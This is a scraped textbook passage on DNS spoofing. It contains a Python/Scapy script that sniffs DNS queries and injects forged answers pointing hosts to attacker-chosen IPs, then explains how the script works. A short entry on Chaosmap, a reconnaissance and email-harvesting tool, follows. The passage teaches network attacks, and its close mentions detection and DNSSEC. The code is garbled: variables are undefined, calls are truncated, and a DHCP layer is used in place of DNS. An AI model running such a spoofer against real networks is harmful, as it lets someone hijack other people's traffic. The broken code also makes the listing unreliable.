Log in / Register
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

6.7 DNS-Spoofing

DNS spoofing, beside ARP spoofing (see Sect. 4.2), is the most popular variant of man-in-the-middle attacks. Similar to ARP spoofing the attacker sends a response with their own IP address as an answer to a DNS query in the hope that their answer arrives before the answer of the real name server.

Therefore we use the much loved Scapy library. The source code of the RST daemon (see Sect. 5.11) is very similar. We sniff the network traffic with the help of Scapys sniff() function, but this time we are only interested in UDP packets from or to port 53. DNS can be used together with TCP but we skip those unusual packets to keep the code as simple as possible. Additionally the tool needs a host file to know for which host it should spoof which IP address.

1 *



The format of the host file is the same as the /etc/hosts file known from Linux or Unix systems. The first entry is the IP address and the second the hostname divided by a space. An asterisk as hostname means we should spoof this IP for all hostnames.

1 #!/usr/bin/python


3 import sys

4 import getopt

5 import scapy.all as scapy


7 dev = "eth0"

8 filter = "udp port 53"

9 file = None

10 dns_map = {}


12 def handle_packet(packet):

13 ip = packet.getlayer(scapy.IP)

14 udp = packet.getlayer(scapy.UDP)

15 dhcp = packet.getlayer(scapy.DHCP)


17 # standard (a record) dns query

18 if dns.qr == 0 and dns.opcode == 0:

19 queried_host = dns.qd.qname[:-1]

20 resolved_ip = None


22 if dns_map.get(queried_host):

23 resolved_ip = dns_map.get(queried_host)

24 elif dns_map.get('*'):

25 resolved_ip = dns_map.get('*')


27 if resolved_ip:

28 dns_answer = scapy.DNSRR(rrname=queried_host + ".",

29 ttl=330,

30 type="A",

31 rclass="IN",

32 rdata=resolved_ip)


34 dns_reply = scapy.IP(src=ip.dst, dst=ip.src) /

35 scapy.UDP(sport=udp.dport,

36 /

37 scapy.DNS(

38 id =,

39 qr = 1,

40 aa = 0,

41 rcode = 0,

42 qd = dns.qd,

43 an = dns_answer

44 )


46 print "Send %s has %s to %s" % (queried_host,

47 resolved_ip,

48 ip.src)

49 scapy.send(dns_reply, iface=dev)



52 def usage():

53 print sys.argv[0] + " -f <hosts-file> -i <dev>"

54 sys.exit(1)



57 def parse_host_file(file):

58 for line in open(file):

59 line = line.rstrip(' ')


61 if line:

62 (ip, host) = line.split()

63 dns_map[host] = ip


65 try:

66 cmd_opts = "f:i:"

67 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

68 except getopt.GetoptError:

69 usage()


71 for opt in opts:

72 if opt[0] == "-i":

73 dev = opt[1]

74 elif opt[0] == "-f":

75 file = opt[1]

76 else:

77 usage()


79 if file:

80 parse_host_file(file)

81 else:

82 usage()


84 print "Spoofing DNS requests on %s" % (dev)

85 scapy.sniff(iface=dev, filter=filter, prn=handle_packet)

The function handle_packet gets invoked for every sniffed packet. It first decodes the IP, UDP and DNS layer to access single protocol properties and ensures that we really caught a DNS query packet. The header property qr is set to zero if the packet is in fact a DNS query and set to one if it is a response packet. The option opcode in contrast defines the subtype of the packet. Zero stands for a “normal” A record request and therefore resolves a hostname to an IP address. A PTR request resolves the name to an IP (for more subtypes please have a look at Table 6.1). The AA bit defines if this packet contains an authoritative answers thus the queried server is itself responsible for the requested domain or if it itself just forwarded the request. The rcode option is responsible for error handling. A value of zero indicates no failure in resolution.

In every DNS response the query is included beside the answer. The answer simply consists of the requested host, the spoofed IP address read from our host file and the Type A to indicate a forward resolve together with the |lstinine|rclass IN| for a Internet address. Source and destination IP and port get switched, because this packet is a response to the packet we caught. Last but not least, the packet is of course sent back.

This kind of attack is very simple to detect as one can see two response packets for just one request. Furthermore variants of DNS evolved to sign their replies cryptographically so the client can realize if it is a legal answer or not. The most commonly deployed variant is DNSSEC.

6.8 Tools

6.8.1 Chaosmap

Chaosmap is a DNS / Whois / web server scanner and information gathering tool. It implements a DNS mapper, which can optionally send WHOIS requests and thus lookup the owner of a domain or IP. This applies also to reverse lookups. In addition, it is suitable for scanning web servers with the help of a dictionary to find hidden devices and files such as password and backup files. If needed these files and directories can be first searched on Google before requesting the real web server. Last but not least, it can be used to harvest e-mail addresses for a given domain or to scan a domain for so called Google hacking requests.

Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
Business & Finance
Computer Science
Language & Literature
Political science